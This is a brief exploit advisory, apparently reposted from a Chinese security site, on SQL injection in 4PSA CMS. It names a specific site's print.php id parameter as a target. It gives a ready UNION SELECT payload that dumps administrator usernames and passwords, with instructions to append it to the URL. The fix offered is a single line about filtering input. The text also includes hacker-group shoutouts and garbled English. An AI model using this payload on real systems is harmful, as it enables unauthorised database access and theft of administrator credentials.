4PSA CMS SQl injection flaws and fixes-vulnerability warning-the black bar safety net

ID MYHACK58:62201233155
Type myhack58
Reporter 佚名
Modified 2012-02-20T00:00:00


Title: 4PSA CMS SQL Injection Vulnerabilities

Author: #BHG Security Center www.2cto.com Nitrojen90

Development program official website: http://www.4psa.com/

Affected version: latest version

Risk level: high

Testing platform: GNU/Linux - Windows


http://www.badguest.cn /print. php? id=[SQL]

write the code in front of the print. php? id= and enter for show all admin

user & Pass.

Eval Code : NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--


Mr. XHat - Bl4ck. Viper - Dj. TiniVini

Provide a fix:

Filter print. php page id of the input parameters